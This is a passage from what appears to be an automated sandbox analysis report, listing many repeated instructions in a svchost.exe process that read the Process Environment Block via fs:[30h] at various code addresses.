            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]2_2_03A6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]2_2_03ABC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]2_2_03AEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]2_2_03A2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]2_2_03A5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]2_2_03A5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]2_2_03ABCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]2_2_03ADEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]2_2_03B04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]2_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]2_2_03A28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]2_2_03ADEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]2_2_03ADEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
